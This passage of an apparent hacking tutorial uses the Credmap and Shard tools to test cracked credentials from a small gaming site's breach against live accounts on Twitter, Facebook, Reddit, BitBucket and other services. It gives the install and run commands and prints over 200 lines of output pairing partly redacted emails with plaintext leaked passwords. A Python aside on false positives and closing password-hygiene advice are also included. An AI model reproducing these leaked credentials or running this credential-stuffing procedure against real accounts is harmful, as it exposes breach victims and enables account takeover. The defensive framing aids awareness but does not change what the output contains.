[********:Finalfantasy89] on "Reddit"...
[********:Finalfantasy89] on "Bitbucket"...
[********:11%3D11bts] on "Scribd"...

All of the usernames were redacted, but the list shows 246 hits: Reddit, Microsoft Live, Scribd, Pinterest, Foursquare, Wunderlist, Wikipedia and LinkedIn accounts, plus a large number on Bitbucket, that Credmap reported as accepting the exact username (or e-mail) and password pair from the small gaming website's dataset. Note that Credmap prints the password URL-encoded, so %40, %21 and %3D in the output stand for @, ! and =.

Option 2: Using Shard

Shard requires Java which may not be present in Kali by default and can be installed using the below command.

sudo apt-get install default-jre

Then, download the latest version of Shard using the wget command.

wget 'https://github.com/philwantsfish/shard/releases/download/1.5/shard-1.5.jar'

Like with Credmap, the --list argument can be used with Shard to view its supported websites.

java -jar shard-1.5.jar --list

[+] Available modules:
[+]     Facebook
[+]     LinkedIn
[+]     Reddit
[+]     Twitter
[+]     Instagram
[+]     GitHub
[+]     BitBucket
[+]     Kijiji
[+]     DigitalOcean
[+]     Vimeo
[+]     Laposte
[+]     Dailymotion

Using Shard only requires the --file argument to begin detecting password reuse.

java -jar shard-1.5.jar --file ~/leaks/cracked/dataset_user_email_pass_combos.txt

[+] Running in multi-user multi-password mode
[+] Parsed 475 credentials
[+] Running 11 modules
[+] *******@mail.ru:9v6Zyl1heT - Twitter
[+] *******@mail.ru:y2v7nG3oeJ - BitBucket
[+] *******@hotmail.com:5Zurt8q8tQ - BitBucket
[+] *******@yandex.com:gD82guh6iS - BitBucket
[+] *******@hotmail.com:jellybaby - BitBucket
[+] *******@gmail.com:actsman7 - Twitter, BitBucket
[+] *******@gmail.com:eternity1 - BitBucket
[+] *******@gmail.com:joker7 - BitBucket
[+] *******@aol.com:xbox360 - BitBucket
[+] *******@gmail.com:pie110016678 - BitBucket
[+] *******@live.com:roblox12 - BitBucket
[+] *******@gmail.com:andre0 - BitBucket
[+] *******@qq.com:123456 - BitBucket
[+] *******@hotmail.com:hellomotto - BitBucket
[+] *******@outlook.com:cromador - BitBucket
[+] *******@hotmail.co.uk:ibanez92 - Twitter
[+] *******@hotmail.com:Presario123 - Twitter
[+] *******@op.pl:isbandia - BitBucket
[+] *******@gmail.com:240sxse - BitBucket
[+] *******@gmail.com:99bottles - Twitter
[+] *******@gmail.com:Checkers12 - Twitter, BitBucket
[+] *******@yahoo.com:speckles - BitBucket
[+] *******@aol.fr:o83bjJ1rzQ - BitBucket
[+] *******@michaelbodach.com:1324Michael1324 - BitBucket
[+] *******@gmail.com:drhs2012 - Twitter
[+] *******@btinternet.com:max1mili0n - Facebook, BitBucket
[+] *******@gmail.com:s8elpz7c - Twitter
[+] *******@yahoo.com:hitman - Twitter
[+] *******@mail.ru:e6bnvVo67H - BitBucket
[+] *******@gmail.com:ab1g0r - BitBucket
[+] *******@gmail.com:snickers7 - BitBucket
[+] *******@gmail.com:1949qweA - BitBucket
[+] *******@live.se:stingray951 - Twitter, BitBucket
[+] *******@outlook.com:Pumpkin007 - Facebook
[+] *******@yahoo.com:baseball11 - Twitter
[+] *******@hotmail.com:h8802123 - BitBucket
[+] *******@mail.ru:i7q8c8jDkW - BitBucket
[+] *******@gmail.com:Hummer1234 - BitBucket
[+] *******@hotmail.com:50killer - BitBucket, Kijiji
[+] *******@gmail.com:igniter123 - BitBucket
[+] *******@hotmail.se:joker123 - BitBucket
[+] *******@gmail.com:orlando.12 - BitBucket
[+] *******@gmail.com:167706 - Twitter
[+] *******@hotmail.com:pssp643056 - Twitter
[+] *******@gmail.com:tacotico - Twitter, BitBucket
[+] *******@Hotmail.com:12341234 - Twitter
[+] *******@comcast.net:1212111 - BitBucket
[+] *******@mail.ru:2hg5hd4uEE - BitBucket
[+] *******@yahoo.com:element1 - BitBucket
[+] *******@msn.com:trooper71 - Facebook, Twitter
[+] *******@gmail.com:Mustang7991 - BitBucket
[+] *******@gmail.com:fuckthat - BitBucket
[+] *******@gmail.com:qy913zdXpN - BitBucket
[+] *******@hotmail.com:vdz3888 - BitBucket
[+] *******@rogers.com:maplew00d - Facebook
[+] *******@hotmail.com:Nd9nw88grB - BitBucket
[+] *******@msn.com:1234567890 - BitBucket
[+] *******@yahoo.com:p00p00p00 - Twitter, BitBucket
[+] *******@HOTMAIL.COM:SLOANE01 - BitBucket
[+] *******@paul198112.plus.com:creative - BitBucket
[+] *******@terra.com.mx:590416 - BitBucket
[+] *******@gmail.com:juan930122 - Facebook, Twitter, BitBucket
[+] *******@aol.de:Madison1990 - BitBucket
[+] *******@verizon.net:entropy33 - BitBucket
[+] *******@gmail.com:rat7 - BitBucket
[+] *******@jacks.sdstate.edu:entern0w - BitBucket
[+] *******@hotmail.com:kevlar11 - BitBucket
[+] *******@hotmail.com:dodgers - BitBucket
[+] *******@mail.ru:wodI14z2eF - BitBucket
[+] *******@gmail.com:jojo82 - BitBucket
[+] *******@gmail.com:maxima1231 - Facebook, BitBucket
[+] *******@yahoo.com:mustang1 - BitBucket
[+] *******@gmail.com:M.ustang9939 - Twitter, BitBucket
[+] *******@gmail.com:ROFLMAO - BitBucket
[+] *******@gmail.com:qwerty - BitBucket
[+] *******@gmail.com:skatebrd1 - Twitter
[+] *******@gmail.com:carrie0530 - BitBucket
[+] *******@gmail.com:Hxopz542 - Twitter, BitBucket
[+] *******@gmail.com:hd070800 - Facebook
[+] *******@yahoo.com:xboxlive - BitBucket
[+] *******@gmail.com:sianlaser12 - BitBucket
[+] *******@live.co.uk:newworldorder11 - Facebook, Twitter
[+] *******@mail.ru:t57yuuD2nH - BitBucket
[+] *******@mail.ru:h8ep81knFR - Twitter, BitBucket
[+] *******@msn.com:Legion01 - Twitter
[+] *******@gmail.com:Vapor1948 - BitBucket
[+] *******@hotmail.com:Kerri14 - BitBucket
[+] *******@mail.ru:271bEzxonZ - BitBucket
[+] *******@gmail.com:raejas11 - Twitter
[+] *******@hotmail.com:2yvpdl13CP - BitBucket
[+] *******@mail.ru:x52Wugvl3D - BitBucket
[+] *******@hotmail.com:bcd234 - BitBucket
[+] *******@hotmail.com:dodgers123 - BitBucket
[+] *******@centurylink.net:zaq11qaz - BitBucket
[+] *******@hotmail.com:stumpy69 - BitBucket
[+] *******@gmail.com:0506571670 - Twitter, BitBucket
[+] *******@ewjc.com:fr33ze - BitBucket
[+] *******@gmail.com:gyqK8Giz1P - BitBucket
[+] *******@gmail.com:abc12345 - BitBucket
[+] *******@hotmail.com:92k2cizCdP - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@yandex.com:drnCy43g4O - Twitter
[+] *******@gmail.com:makocole1 - Twitter, Kijiji
[+] *******@gmail.com:Ayrtonsenna1 - Facebook
[+] *******@gmail.com:sixsixsix - BitBucket
[+] *******@aol.com:aerielle - BitBucket
[+] *******@yahoo.com:12341234a - Twitter
[+] *******@gmail.com:6Ibit6qp1F - BitBucket
[+] *******@gmail.com:Sapper2009 - Facebook, Twitter, BitBucket
[+] *******@gmail.com:bma81092 - Twitter, BitBucket
[+] *******@hotmail.com:tournament - BitBucket
[+] *******@hotmail.com:Lena2020 - Facebook, Twitter, BitBucket
[+] *******@yahoo.com:600543jp - BitBucket
[+] *******@blueyonder.co.uk:simpkins - BitBucket
[+] *******@gmail.com:linkin2632 - Twitter
[+] *******@yahoo.com:c572889 - Twitter
[+] *******@yahoo.com.mx:alejandro - BitBucket
[+] *******@gmail.com:conconab - BitBucket
[+] *******@free.fr:sucette - BitBucket
[+] *******@hotmail.com:pipQc5p24Q - BitBucket
[+] *******@h4milton.com:pepper10 - BitBucket
[+] *******@gmail.com:Cheese24 - BitBucket
[+] *******@gmail.com:willow76! - Facebook, Kijiji
[+] *******@live.ca:shawn2000 - Twitter, BitBucket
[+] *******@gmail.com:spartan117 - Twitter, BitBucket
[+] *******@hotmail.com:fifa2007 - Twitter
[+] *******@yahoo.com:mike1828 - BitBucket
[+] *******@live.com:Bounce989 - Twitter, BitBucket
[+] *******@gmail.com:13241324 - Twitter
[+] *******@mail.ru:e5Bo1fx3kF - BitBucket
[+] *******@mail.ru:1doc2H5wxZ - BitBucket
[+] *******@mail.ru:irzF9k6p1H - Twitter
[+] *******@gmail.com:roblox12 - Facebook, Twitter
[+] *******@hotmail.com:helmond - BitBucket
[+] *******@gmail.com:Liam1123 - BitBucket
[+] *******@yahoo.com:be6315se - Twitter
[+] *******@hotmail.com:r1s2d3nt - BitBucket
[+] *******@hotmail.com:rock18 - BitBucket
[+] *******@gmail.com:bossos2 - BitBucket
[+] *******@gmail.com:highjump - BitBucket
[+] *******@googlemail.com:juhu1230 - BitBucket
[+] *******@charter.net:amanda11 - BitBucket
[+] *******@gmail.com:Adw2u1h3tO - BitBucket
[+] *******@hotmail.com:ragnarok01 - Twitter
[+] *******@hotmail.com:Bobbobbob5 - Twitter, BitBucket
[+] *******@gmail.com:Games123 - Twitter
[+] *******@hotmail.com:good4u - Kijiji
[+] *******@hotmail.com:2211 - BitBucket
[+] *******@gmail.com:starwars97 - BitBucket
[+] *******@aol.com:hardass - BitBucket
[+] *******@gmail.com:scarface - BitBucket
[+] *******@t-online.de:143ABC1 - BitBucket
[+] *******@gmail.com:weswee234 - Twitter
[+] *******@hotmail.com:javiermago1 - BitBucket
[+] *******@yahoo.com:w1a2y3n4e5 - BitBucket
[+] *******@gmail.com:608881e - Kijiji
[+] *******@yahoo.com:074langley - BitBucket
[+] *******@hotmail.com:bosspimp - Facebook, Twitter
[+] *******@gmail.com:Driftking1 - Twitter
[+] *******@hotmail.com:voxpi384 - BitBucket
[+] *******@gmail.com:allah4life - BitBucket
[+] *******@comcast.net:Jackal67 - BitBucket
[+] *******@hotmail.com:jasmine00 - Facebook, BitBucket
[+] *******@gmail.com:10241966 - BitBucket
[+] *******@gmail.com:alfiedog12 - BitBucket
[+] *******@gmail.com:0olivia1 - BitBucket
[+] *******@gmail.com:Rat_isthebest - Kijiji
[+] *******@web.de:scoop - BitBucket
[+] *******@hotmail.com:ikbengek1 - Twitter, BitBucket
[+] *******@allansmith.net:ras04cal - Twitter
[+] *******@419.e90.biz:b82olSn4yH - BitBucket
[+] *******@hotmail.com:tototomy - Twitter
[+] *******@gmail.com:2211 - BitBucket
[+] *******@qq.com:1391730 - Twitter
[+] *******@gmail.com:robby123 - BitBucket
[+] *******@gmail.com:Logitech123 - BitBucket
[+] *******@yahoo.com:darkstar3509 - BitBucket
[+] *******@gmail.com:whodey - BitBucket
[+] *******@uhd.net.ua:h55gr5sKdQ - BitBucket
[+] *******@gmail.com:roblox12 - BitBucket
[+] *******@gmail.com:12345Brandon - BitBucket
[+] *******@gmail.com:Banan123 - BitBucket
[+] *******@gmail.com:joshuavi - Kijiji
[+] *******@cox.net:damnkids - BitBucket
[+] *******@hotmail.com:1kolort2 - BitBucket
[+] *******@live.com:roblox12 - Twitter, BitBucket
[+] *******@gmail.com:azerty00 - Twitter
[+] *******@gmail.com:apache7076 - Twitter
[+] *******@inmyd.ru:2wbJx11zaW - BitBucket
[+] *******@aim.com:thisisme - BitBucket
[+] *******@gmail.com:dacheng198 - BitBucket
[+] *******@GMAIL.COM:BASSETT92 - BitBucket
[+] *******@gmail.com:123456 - BitBucket
[+] *******@hotmail.com:syndrom02 - Twitter, BitBucket
[+] *******@gmail.com:bronco999 - BitBucket
[+] *******@hotmail.com:metallica4224 - Twitter
[+] *******@gmail.com:rawtheme22 - Twitter
[+] *******@gmail.com:sobaked123 - BitBucket
[+] *******@gmail.com:Thee1234 - BitBucket
[+] *******@hotmail.ca:0230176 - BitBucket
[+] *******@gmail.com:19722791 - BitBucket
[+] *******@gmail.com:indonesia2016 - BitBucket
[+] *******@live.co.uk:01cs653 - Facebook, BitBucket
[+] *******@gmail.com:Battlefield710 - Twitter, BitBucket
[+] *******@gmail.com:Supaman1 - Facebook
[+] *******@hotmail.com:Bigdick*12 - BitBucket
[+] *******@outlook.com:darkstar1 - BitBucket
[+] *******@web.de:gt9800 - BitBucket
[+] *******@yahoo.com:mvp123 - Twitter
[+] *******@yahoo.com:arturi09 - BitBucket
[+] *******@gmail.com:092486 - BitBucket
[+] *******@hotmail.com:sappeps12345 - BitBucket
[+] *******@yahoo.com:1morerep - Twitter, BitBucket
[+] *******@cox.net:joiedevivre - BitBucket
[+] *******@gmail.com:23vec4rPcC - BitBucket

After running the Shard command, a total of 219 Twitter, Facebook, BitBucket, and Kijiji accounts were reported as using the same exact username:password combinations. Interestingly, there were no Reddit detections this time.

The Shard results reported 166 BitBucket accounts compromised by this password-reuse attack, which is inconsistent with Credmap's 111 BitBucket detections. Neither Credmap nor Shard has been updated since 2016, and I suspect the BitBucket results are mostly (if not entirely) false positives. Tools like these decide that a login succeeded from what comes back in the response to the login request (an expected redirect, cookie or page string). If BitBucket has changed its login flow since 2016, a check that merely looks for the absence of an old error message will report every attempt as a success. Any hit from such a tool should be confirmed manually, or at least by checking that a credential known to be wrong is reported as a failure, before it is counted.
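The false-positive suspicion above is worth making concrete. As an added example (not Credmap's or Shard's code, whose internals the article does not show), here are two ways a reuse checker can decide whether a login POST succeeded, run against constructed responses: a negative heuristic that reports success whenever no known error string is present, and a positive check that requires a redirect away from the form plus a session cookie. The response objects, marker strings, `/login` path and `session_id` cookie name are assumptions for the example, not any site's real values.

```python
"""Added example (not Credmap's or Shard's code): two ways of judging a login
response, run against constructed responses to show where false positives come
from. The /login path, session_id cookie name, error strings and every response
below are assumptions for the example, not any site's real values."""
from __future__ import annotations

from dataclasses import dataclass, field
from enum import Enum


class Verdict(Enum):
    VALID = "valid"        # credentials accepted
    INVALID = "invalid"    # credentials rejected
    BLOCKED = "blocked"    # rate limit or captcha: says nothing about the password
    UNKNOWN = "unknown"    # response not recognised: the site module needs updating


@dataclass
class Response:
    """The parts of a login-POST response a checker looks at (constructed)."""
    status: int
    body: str = ""
    headers: dict[str, str] = field(default_factory=dict)
    cookies: dict[str, str] = field(default_factory=dict)


# Error strings the module author saw on the site when the module was written.
ERROR_MARKERS = ("Incorrect password", "Invalid username or password")


def negative_heuristic(resp: Response) -> Verdict:
    """'Valid unless a known error string appears.' Cheap, and wrong the moment
    the site rewords its error, adds a captcha or changes its login flow."""
    if any(m in resp.body for m in ERROR_MARKERS):
        return Verdict.INVALID
    return Verdict.VALID


def positive_check(resp: Response, login_path: str = "/login",
                   session_cookie: str = "session_id") -> Verdict:
    """Report VALID only on evidence of an established session: a redirect away
    from the login form together with a session cookie."""
    if resp.status == 429 or "captcha" in resp.body.lower():
        return Verdict.BLOCKED
    if resp.status in (301, 302, 303):
        location = resp.headers.get("Location", "")
        if location.startswith(login_path):
            return Verdict.INVALID              # bounced back to the form
        if session_cookie in resp.cookies:
            return Verdict.VALID
        return Verdict.UNKNOWN
    if resp.status == 200 and any(m in resp.body for m in ERROR_MARKERS):
        return Verdict.INVALID
    return Verdict.UNKNOWN


def module_is_trustworthy(checker, control_response: Response) -> bool:
    """Control test: hand the checker the response to a credential pair known to
    be wrong. A checker that calls that VALID cannot be trusted on real hits."""
    return checker(control_response) is not Verdict.VALID


# Constructed responses covering the situations a checker meets in practice.
SCENARIOS = {
    "real success": Response(302, headers={"Location": "/dashboard"},
                             cookies={"session_id": "c0ffee"}),
    "failure, original wording": Response(200, body="<p>Incorrect password</p>"),
    "failure, reworded after redesign": Response(
        200, body="<div class='alert'>Those credentials did not match our records.</div>"),
    "failure, redirect back to form": Response(302, headers={"Location": "/login?error=1"}),
    "rate limited": Response(429, body="Too many attempts, try again later"),
}


def compare(scenarios=SCENARIOS) -> dict[str, tuple[Verdict, Verdict]]:
    """(negative heuristic verdict, positive check verdict) for each scenario."""
    return {name: (negative_heuristic(r), positive_check(r)) for name, r in scenarios.items()}
```

The reworded-error, redirect-back and rate-limited cases are where the two diverge: the negative heuristic calls all three a hit, which is how a module written against a 2016 login page can report every account on a redesigned site as compromised, while the positive check returns UNKNOWN, INVALID and BLOCKED. `module_is_trustworthy` is the control to run before counting any tool's hits: feed the module one credential pair you know to be wrong and discard its output for that site if the answer comes back as valid.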

Motivated Hackers Can Crack Even More Passwords

In total (omitting the BitBucket data), the compromised accounts consisted of 61 from Twitter, 52 from Reddit, 29 from Scribd, 23 from Microsoft, 17 from Facebook, and a handful each from Pinterest, Foursquare, Wunderlist, and Kijiji: roughly 200 online accounts compromised as a result of one small data breach from 2017.

And keep in mind, neither Credmap nor Shard check for password reuse against Gmail, Netflix, iCloud, banking websites, or smaller websites that likely contain personal information like BestBuy, Macy's, and airline companies.

If Credmap's and Shard's site modules were brought up to date, and if I had spent more time on the remaining 57% of hashes, the numbers would be higher. With very little effort and time, an attacker can compromise hundreds of online accounts from a small breach of just 1,100 e-mail addresses and hashed passwords.

A motivated attacker holding a breach of 8 million or 26 million unique credentials could do serious damage across thousands of online accounts.

Don't Ignore Data Breaches...

If you don't want your usernames and passwords showing up in any of these leaked databases, there are a few obvious things you can do:

  • Change your passwords. Right now. And make them strong and unique per site. Use a proper password manager like KeePassX or LastPass to store all of your sensitive data. Take an afternoon and reset all of your passwords, even the small gaming accounts you forgot you signed up for. Where a site offers two-factor authentication, turn it on: a reused password alone then no longer opens the account.
  • Pay attention. Stay current with data breaches as they happen. There are many reputable news outlets that provide hacker-related news as it occurs.
  • React. When data breaches happen, don't ignore them. If you've ever been affiliated with the website affected by a breach, change your password immediately. If you're not using the account anymore or don't absolutely need it, delete it. Don't think a website is too small to be compromised. A hacker can easily pivot from one small account to your primary email address. It's possible.

Until next time, follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.

Cover photo by Justin Meyers/Null Byte
